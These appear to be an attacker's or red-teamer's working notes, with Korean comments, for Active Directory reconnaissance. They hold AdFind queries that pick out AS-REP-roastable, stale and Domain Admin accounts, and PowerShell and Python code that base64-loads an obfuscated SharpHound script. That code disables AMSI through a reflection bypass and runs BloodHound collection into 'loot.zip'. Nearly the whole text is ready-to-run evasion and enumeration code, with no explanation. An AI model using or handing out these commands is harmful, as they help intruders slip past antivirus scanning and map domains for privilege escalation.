adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))" sAMAccountName
adfind -f "(&(objectcategory=user)(lastLogonTimestamp<=132000000000000000))" sAMAccountName lastLogonTimestamp
adfind -f "memberof=CN=Domain Admins,CN=Users,DC=domain,DC=com" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=64))" sAMAccountName
adfind -f "(&(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" sAMAccountName

$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content .\SharpHound_Obfuscated.ps1 -Raw)))
$encoded | Out-File .\enc.txt

$content = Get-Content .\enc.txt -Raw
$decoded = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($content))
Invoke-Expression $decoded



import subprocess
import base64

# base64 SharpHound 코드 로드
with open("SharpHound_Obfuscated_Base64.txt", "rb") as f:
    b64code = f.read()

decoded = base64.b64decode(b64code).decode("utf-8")

# AMSI Bypass 코드
amsi_bypass = """
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')\
.GetField('amsiInitFailed','NonPublic,Static')\
.SetValue($null,$true)
"""

# 결합 후 실행할 PowerShell 코드
final_script = amsi_bypass + "\n" + decoded + "\nInvoke-BloodHound -CollectionMethod All -ZipFileName loot.zip\n"

# 실행
proc = subprocess.run(
    ["powershell", "-NoProfile", "-ExecutionPolicy", "Bypass", "-Command", "-"],
    input=final_script,
    text=True,
    capture_output=True
)

print("[STDOUT]")
print(proc.stdout)
print("[STDERR]")
print(proc.stderr)


bloodhound-python -u <username> -p <password> -d <domain> -dc-ip <dc-ip> -c All


